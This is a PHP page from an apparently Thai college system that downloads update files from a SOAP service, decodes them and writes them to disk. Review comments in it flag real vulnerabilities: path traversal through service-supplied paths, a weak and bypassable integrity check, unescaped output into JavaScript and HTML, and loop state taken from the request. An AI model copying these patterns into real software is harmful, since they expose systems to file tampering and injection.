<?
include_once("pagebody.php");
//pageHeader();
// Heading for the page; $pageTitle is left as a global in case included code reads it.
// (Thai: roughly "accessing the system" — translation approximate.)
$pageTitle = "การเข้าใช้ระบบงาน";
echo '<table width=100% class="pageTitleBgColor" align="center">' . "\n"
   . '<tr><td align=center>' . $pageTitle . '</td></tr>' . "\n"
   . '</table>';
?>
<!--your code here-------------------------------------------------------------------------->
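<?
include_once("clsumfileupdate.php");
include_once("clsumfileupdatetemp.php");
include_once("lib/nusoap/nusoap.php");
include_once("lib/nusoap/globalversion.php");
include_once("lib/nusoap/funct.php");
// Fix: the connection object was assigned to $oFd and overwritten on the very next
// line, while both model objects were built from $oC, which is never assigned in this
// file. Keep the connection in $oC so the models receive it.
$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
// $oFd: umfileupdate record access (SearchByfileId / GetRecord / AddNew / Save / Delete below).
$oFd = new umfileupdate($oC);
// $oFdt: umfileupdatetemp record access (countfile / AddNew / Save below).
$oFdt = new umfileupdatetemp($oC);
?>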
<?
/////////////////////////////////////////////////////
	// Per-deployment settings, all read from globals defined by the includes above:
	// the college identifier and system id sent with every SOAP call, and the SOAP
	// endpoint URL handed to soapclient2 further down. $savefiletodir is not read
	// anywhere in this file.
	$server_path   = $GLOBALS["SERVER_PATH"];
	$sysId         = $GLOBALS["SYS_ID_U"];
	$collegecode   = $GLOBALS["COLLEGECODE"];
	$savefiletodir = "../";  // real
////////////////////////////////////////////////////
?>

<?					
	// Overall flow of this page (it runs inside a frame and drives the parent via
	// parent.print_output() / parent.location.href):
	//   1. connect to the central update service at $server_path over SOAP (nusoap);
	//   2. ask 'update' for the comma-separated list of file ids for ($collegecode, $sysId);
	//   3. fetch ONE file with 'getfile', verify it, write it under ./fileupdate/<path>,
	//      and record it through $oFd / $oFdt;
	//   4. reload itself via <meta refresh> carrying the remaining ids, until none are left.
	// NOTE(review): $success, $fileid_want, $check, $fileerror and $countbar are read in
	// this file but never assigned in it. They match the query parameters of the refresh
	// URL on the last line, so presumably they are populated from the request
	// (register_globals-style) — confirm. If so, the loop state (which id is next, whether
	// the 'update' call is skipped) is supplied by the client on every reload and should be
	// validated or kept server-side (session) instead.
	// $p is only a scratch variable; it is reused by the path-splitting loop below.
	$p=getcwd();
	
	// Create the client instance
	
	// $server_path comes from $GLOBALS["SERVER_PATH"]. Every file written by this page is
	// dictated by whatever answers at that URL, so the integrity of that endpoint (TLS,
	// host verification) is the trust boundary of this script.
    $client = new soapclient2($server_path);
	$err = $client->getError();
	if($err){
		//echo '<h2 style="background-color:#ff0000">1 Constructor error</h2><pre>' . $err . '</pre>';
		// $error is echoed straight into a JavaScript string literal below with no
		// json_encode()/urlencode(); a quote or "</script>" in the error text breaks out of
		// the literal. The same pattern is used wherever $error is echoed in this file.
		// Note also that execution continues after the redirect is emitted.
		$error="Constructor error :: ".$err;
		?>
		<script type="text/javascript">
				parent.location.href = "updateFile.php?nofile=3&error=<? echo $error; ?>";
		</script>
		<?
	}
	
	// Call the SOAP method
	// First pass only ($success not "1"): 'update' returns the id list; $cv is a working
	// copy consumed by the counting loop further down.
	if($success!="1"){
		$result = $client->call('update', array('collegeCode' => $collegecode,'sysId' => $sysId));
		$cv=$result;
		
	}
	if($client->fault){
		//echo '<h2>2 Fault call method update</h2><pre>'; print_r($result); echo '</pre>'; 
		// print_r() without its second argument prints $result to the page and returns true,
		// so $error becomes "Fault call method update :: 1"; print_r($result, true) was
		// presumably intended.
		$error="Fault call method update :: ".print_r($result);
		?>
					<script type="text/javascript">
							parent.location.href = "updateFile.php?nofile=3&error=<? echo $error; ?>";
					</script>
		<?		
	}else{
		$err = $client->getError();
		//echo $err;
		//echo $result;
		//echo $fileid_want;
		// A transport/parse error, or an empty reply with nothing pending, is treated as
		// "cannot reach the server".
		if($err || ($result=="" && $fileid_want=="")){   //can not connect server  
			//echo '<h2 style="background-color:#ff0000">3 Error</h2><pre>' . $err . '</pre>';
			$error=$err;
			$a=1;   // unused
				$fileerror="1";
				// Nothing staged in umfileupdatetemp yet: back to the start page; otherwise
				// let the user pick from what was already fetched.
				if($oFdt->countfile()=="0"){
			?>
					<script type="text/javascript">
							parent.location.href = "updateFile.php?nofile=3&error=<? echo $error; ?>";
					</script>
			<?
					
				}else{
				
			?>
					<script type="text/javascript">
							parent.location.href = "selectFile.php?fileerror=1";
					</script>
			<?
				}
		}else{		
			// Debug output: the raw service reply (the id list) is written to the page unescaped.
			echo '<h2>Result</h2><pre>' . $result . '</pre>';				
			if($result=="No"){ 
				$counttotal=0;
				?>
				<script type="text/javascript">
					parent.print_output(1,1);
				</script>
				<script type="text/javascript">
						parent.location.href = "updateFile.php?nofile=1";
				</script>
				<? 
			}else{
				// Count the ids in the list (first pass only). split() is the POSIX-regex
				// variant — deprecated since PHP 5.3 and removed in 7.0. $cu starts unset, so
				// the first ++ yields 1.
				if($success!="1"){
					while($cv!=""){
						list($ff,$cv)=split(',',$cv,2);
						$cu++;
					}
					$counttotal=$cu;
				}
				
				echo "===============$counttotal";
				$pathnow=getcwd(); 
				//create folder fileupdate	
				// Make sure ./fileupdate exists in the current directory (the script's own
				// directory at this point).
				if ($handlef = opendir(getcwd())) {
					$checkfolder=0;
					while (false !== ($file = readdir($handlef))) {
						if($file=="fileupdate"){
							$checkfolder=1;
						}		
					}
					if($checkfolder==0){
						mkdir("fileupdate",0775);
					}
					closedir($handlef);
				}
					
				//loop change result				
				// Pop the first id off the list; $result keeps the remainder and is carried
				// to the next reload by the meta refresh at the bottom.
				list($fileid_want,$result)=split(',',$result,2);
				echo "fileidwant=".$fileid_want."<br>";
				echo "result=".$result."<br>";
				// Positional field list for 'getfile'; the reply $result1 is indexed the same
				// way (0 collegeCode … 9 updatetime, 10 textcode). The trailing '2549-11-10'
				// literal (a Buddhist-era date) is passed as-is; its role is not visible here.
				$names = array($collegecode, $fileid_want, 'filename1', 'filename2','path','text','detail','flagfile','sysId','updatetime','textcode','2549-11-10');
				$result1 = $client->call('getfile',array('names' => $names)); 	
				if($client->fault){
					// Prints $result (the id list) rather than $result1 — looks like a copy/paste slip.
					echo '<h2>Fault call method getfile</h2><pre>'; print_r($result); echo '</pre>';
				}else{
					//check data--------------------
					// Unwrap the payload: base64 -> gzuncompress -> base64 -> gzuncompress.
					// $textwrite keeps the output of the second gzuncompress; one further
					// base64_decode() of it is what gets written to disk below. Every
					// intermediate stage is echoed to the page (debug output that dumps the
					// whole file content into the response), and neither base64_decode() nor
					// gzuncompress() has its false return checked.
					$text_en=$result1[5];
					echo "first=<br>".$text_en;
					echo "<br>";

					$text_en=base64_decode($text_en);
					echo "base64_decode1=<br>".$text_en;
					echo "<br>";
					
					$text_en=gzuncompress($text_en);
					echo "gzuncompress1=<br>".$text_en;
					echo "<br>";
					
					$text_en=base64_decode($text_en);
					echo "base64_decode2=<br>".$text_en;
					echo "<br>";
					
					$text_en=gzuncompress($text_en);
					$textwrite=$text_en;
					echo "gzuncompres2s=<br>".$text_en;
					echo "<br>";

					// Integrity check: md5 of base64(bytes 26..35 of the decoded file) is
					// compared with the 'textcode' field (index 10). It covers only a 10-byte
					// slice, and the branch below also accepts a mismatch whenever
					// flagfile == "3" (delete), so the condition reduces to
					// ($text_en == $result1[10] || $result1[7] == "3"). $text_en2 is unused.
					$text_en2=base64_decode($text_en);
					$text_en=base64_decode($text_en);

					$text_en=substr($text_en,26,10);
					$test_en=base64_encode($text_en);
					$text_en=md5($test_en);
					
					if($text_en==$result1[10] || (($text_en!=$result1[10]) && ($result1[7]=="3"))){
					
						chdir($pathnow);
						$result1[6]=base64_decode($result1[6]);
						
						// Debug dump of the record; field values come from the service and are
						// written to the page unescaped.
						echo '<h2>-------------------------</h2>';
						echo '<h2>collegeCode</h2><pre>' . $result1[0]. '</pre>';
						echo '<h2>fileId</h2><pre>' . $result1[1]. '</pre>';
						echo '<h2>filename1</h2><pre>' . $result1[2]. '</pre>';
						echo '<h2>filename2</h2><pre>' . $result1[3]. '</pre>';
						echo '<h2>path</h2><pre>' . $result1[4]. '</pre>';
						echo '<h2>text</h2><pre>' . $result1[5]. '</pre>';   					
						echo '<h2>detail</h2><pre>' . $result1[6]. '</pre>';
						echo '<h2>flagfile</h2><pre>' . $result1[7]. '</pre>';
						echo '<h2>sysId</h2><pre>' . $result1[8]. '</pre>';
						echo '<h2>updatetime</h2><pre>' . $result1[9]. '</pre>';  
						echo "-------------------------------------<br>";
						
						//set path and create folder
						// Target directory is ./fileupdate + the 'path' field exactly as the
						// service sent it. Nothing rejects ".." or an absolute path before the
						// chdir()/mkdir()/unlink()/fopen() calls below, so a malformed or hostile
						// reply can place or delete files outside ./fileupdate. Resolving the
						// final location with realpath() and requiring it to stay under
						// $pathnow."/fileupdate" would close that.
						$path="/fileupdate".$result1[4];
							
						// Split $path into components, deepest first ($folder[1] is the last
						// component). $f (which starts with "/") is used unescaped as the regex
						// pattern of the second split(), so a component containing regex
						// metacharacters breaks this loop.
						$pathfile=$path;
						$i=1;
						while(strrchr($pathfile,'/')!=""){
							$f=strrchr($pathfile,'/');
							list($p,$fo) = split('[/]',$f);
							$folder[$i]=$fo;
							//echo $folder[$i]."<br>";
							list($pathfile,$p) = split($f,$pathfile);
							$i++;
						}
						// Reverse into $newf so that $newf[1] is the top-level "fileupdate".
						for($j=1; $j<$i; $j++){
							$newf[$j]=$folder[$i-$j];
							//echo "newf=".$newf[$j]."<br>";
						}
						////
						// Walk down $newf, chdir()ing into each component and creating the next
						// one if no entry of that name exists. $checknotfound is set by any
						// other entry (including "." and ".."), so "missing" effectively means
						// "no entry named $newf[$k]". On the last iteration $newf[$k] is unset,
						// $save stays "" and nothing is created. Whether the deepest component
						// is a directory or the file name itself depends on the exact shape of
						// $result1[4] (trailing slash or not) — not determinable from here.
						for($k=2; $k<=$j; $k++){
							$checknotfound=0;
							$checkfound=0;
							chdir($newf[$k-1]);
							if ($handle = opendir(getcwd())) {
								$checknotfound=0;
								 while (false !== ($file = readdir($handle))) {
									if ($file != "." && $file != "..") {
										if($file==$newf[$k]){
											$checkfound=1;
										}else{
											$checknotfound=1;
											$save=$newf[$k];		
										}
									}else{
										if($file==$newf[$k]){
											$checkfound=1;
										}else{
											$checknotfound=1;
											$save=$newf[$k];
						
										}				   
									}
								}
								if($checknotfound=="1" && $checkfound!=1){
									if($save==""){
															
									}else{
										mkdir($save,0775);
										//chmod($save,0775);
									}		
								}
								closedir($handle);
							}		
						}
						/////
						
						// Remove any existing copy, then (unless flagfile == "3", delete only)
						// write the decoded content. $fileIwant is relative to the directory
						// chdir()'d into above. If fopen() fails, $handle is false and fwrite()
						// is still attempted; $error becomes 1 either way.
						$fileIwant=$result1[3];
						echo "fileIwant=$fileIwant<br>";
						unlink($fileIwant);
						//if not delete file
						if($result1[7]!="3"){
							if (!$handle = fopen($fileIwant, 'a')) {
								echo "Cannot open file ($fileIwant)";
								$error=1; 
							}
							if (fwrite($handle, base64_decode($textwrite)) === FALSE) {
								echo "Cannot write to file ($fileIwant)";
								$error=1;
							}
						}
						
						// Record the file in umfileupdate (replacing any row with the same
						// fileId), then tell the service it was stored ('set_to_db'); on a fault
						// roll the local row back. $error!=1 is a loose comparison, so a string
						// left in $error by an earlier branch also counts as "no error".
						if($error!=1){
							//echo "Success, wrote to file ($fileIwant)";
							$oFd->SearchByfileId($result1[1]);
							if($oFd->GetRecord()=="1"){
								$oFd->Delete();
							}
							
							$oFd->AddNew();
							$oFd->fileId=$result1[1];
							$oFd->updateDate=getNowDateth();
							$oFd->filename1=$result1[2];
							$oFd->filename2=$result1[3];
							$oFd->flagfile=$result1[7];
							$oFd->flagupdate="D";
							$oFd->path=$result1[4];
							$oFd->detail=$result1[6];
							$oFd->sysId=$result1[8];
							$oFd->updatetime=$result1[9];
							$oFd->flagselect="N";
							$oFd->flagrestore="N";
							$oFd->flaguse="N";
							$oFd->Save();
							
							$result2 = $client->call('set_to_db', array('fileId' => $result1[1],'collegeCode' => $collegecode));
							if($client->fault){
								$oFd->SearchByfileId($result1[1]);
								$oFd->GetRecord();
								$oFd->Delete();
								// Again prints $result rather than $result2.
								echo '<h2>Fault call method set_to_db</h2><pre>'; print_r($result); echo '</pre>';
							}else{
								$folderfile=getcwd();
								// "Y" = accepted by the service: stage the id in umfileupdatetemp
								// and return to the script directory. On any other reply the
								// working directory is left where the path loop put it.
								if($result2=="Y"){
									$oFdt->AddNew();
									$oFdt->fileId=$result1[1];
									$oFdt->Save();
									chdir($pathnow);	
								}
							}
						}else{
							$oFd->SearchByfileId($result1[1]);
							$oFd->GetRecord();
							$oFd->Delete();
						} // if error ==1
					
					}else{
						// Checksum mismatch on a non-delete file: nofile=4 when at most one file
						// is staged, otherwise let the user choose from the staged ones.
						$fileerror="1";
						if($oFdt->countfile()=="0" || $oFdt->countfile()=="1"){
						?>
								<script type="text/javascript">
										parent.location.href = "updateFile.php?nofile=4";
								</script>
						<?
								
						}else{
						?>
								<script type="text/javascript">
										parent.location.href = "selectFile.php?fileerror=1";
								</script>
						<?
						}		
					}  //check error file md5()
					
				} //if err method getfile
				// Progress bar update for the parent frame.
				$countbar++;
				//echo "============= $countbar";
				$total=$counttotal;
				?>
				<script type="text/javascript">
					parent.print_output(<?php echo $countbar;?>, <?php echo $total; ?>);
				</script>
				<?												
				// The list is exhausted after this file: go to the selection page.
				if($result=="" && $fileid_want!=""){
				?>
				<script type="text/javascript">
					parent.location.href = "selectFile.php";
				</script>
				<?
				} 	
				// Reload this page for the next id, round-tripping the loop state through the
				// query string. The values are interpolated into the HTML attribute with no
				// urlencode()/htmlspecialchars(), and they are the same request-supplied
				// variables noted at the top of this script.
				echo "<meta http-equiv='refresh' content='0; URL=submitUpdate.php?result=$result&check=$check&fileid_want=$fileid_want&fileerror=$fileerror&success=1&countbar=$countbar&counttotal=$counttotal'>";							
			}  //if result not No
		} // if err method update 	
	} // if fault
?>
<!--------------------------------------------------------------------->
<? //pageFooter(); ?>
<!--------------------------------------------------------------------->
